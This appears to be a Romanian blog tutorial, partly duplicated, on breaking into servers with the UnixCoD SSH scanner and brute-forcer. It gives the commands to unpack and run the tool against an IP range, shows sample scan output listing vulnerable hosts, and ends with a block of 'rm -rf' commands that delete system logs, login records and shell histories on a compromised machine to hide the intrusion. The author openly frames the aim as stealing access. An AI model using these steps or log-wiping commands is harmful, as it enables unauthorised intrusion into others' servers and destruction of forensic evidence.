Toti cauta sa sparga rooturi sau alte servici de care pot profita in mediul online..Un exemplu de "munca" ar fi:
De ce avem nevoie:
-1- bucata scanner ssh
-2- bucata brute force ssh
-3- 2 in 1
....
Avem nevoie de scannerul: unixcod
Descarcam scannerul:[Doar userii inregistrati pot vedea linkurile. ]
PS : tool-ul folosit este unul destul de comod care se descurca destul de bine , dar totusi , daca vrei sa furi ceva bun ai nevoie de ceva pe masura.
Deschidem consola..
Folosim comanda de extragere:Fisierul este extras..acum frumos selectam din consola calea catre folder:
Acum ca sa pornim scannerul , in folderul sursa , dam comanda:Unde ip sunt primele 2 rangeuri dintr-un ip , de exemplu din ip-ul 100.111.122.133 luam doar 100.111.
EXEMPLU:
Cand acceseri un root/server web e bine sa iti stergi logurile , in masura permisiunilor furate:
Avem comenzile urmatoare
Alte completari o sa aduc in masura intrebarilor postate.
De ce avem nevoie:
-1- bucata scanner ssh
-2- bucata brute force ssh
-3- 2 in 1
....
Avem nevoie de scannerul: unixcod
Descarcam scannerul:[Doar userii inregistrati pot vedea linkurile. ]
PS : tool-ul folosit este unul destul de comod care se descurca destul de bine , dar totusi , daca vrei sa furi ceva bun ai nevoie de ceva pe masura.
Deschidem consola..
Folosim comanda de extragere:
Code:
sudo tar -zxvf
Code:
cd
Acum ca sa pornim scannerul , in folderul sursa , dam comanda:
Code:
./unix ip.ip
EXEMPLU:
Code:
Start scan: user@user-desktop:~/unixcod$ ./unix 70.70 [+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+] [+] SSH Brute force scanner : user & password [+] [+] Undernet Channel : #UnixCoD [+] [+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+] [+] Scanam: 70.70.4.* (total: 2) (1.6% done) Scan finish: [+] Find ip a terminat in 530 de secunde. [Am gasit 66 ip`uri] [+] Incepe partea cea mai misto :D [+] Doar 66 de servere. Exista un inceput pt. toate ! [=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=] [+] Incepem sa vedem cate server putem sparge [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Scanner a terminat de scanat !
Cand acceseri un root/server web e bine sa iti stergi logurile , in masura permisiunilor furate:
Avem comenzile urmatoare
Code:
______________________________________________ | | +LOG REMOVE SHELL COMAND+ | | |___|____________________________________|___| | + | rm -rf unixcod | + | | + | rm -rf /tmp/logs | + | | + | rm -rf $HISTFILE | + | | + | rm -rf /root/.ksh_history | + | | + | rm -rf /root/.bash_history | + | | + | rm -rf /root/.ksh_history | + | | + | rm -rf /root/.bash_logout | + | | + | rm -rf /usr/local/apache/logs | + | | + | rm -rf /usr/local/apache/log | + | | + | rm -rf /var/apache/logs | + | | + | rm -rf /var/apache/log | + | | + | rm -rf /var/run/utmp | + | | + | rm -rf /var/logs | + | | + | rm -rf /var/log | + | | + | rm -rf /var/adm | + | | + | rm -rf /etc/wtmp | + | | + | rm -rf /etc/utmp | + | | + | | + | | + |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| + | | + | | + | |_+_|____________________________________|_+_|
Alte completari o sa aduc in masura intrebarilor postate.
__________________
2 comentarii:
Foarte buna initiativa, mult succes in ceea ce vrei sa intreprinzi!
Mi-a placut mult articolul DVS. Multumesc!
Trimiteți un comentariu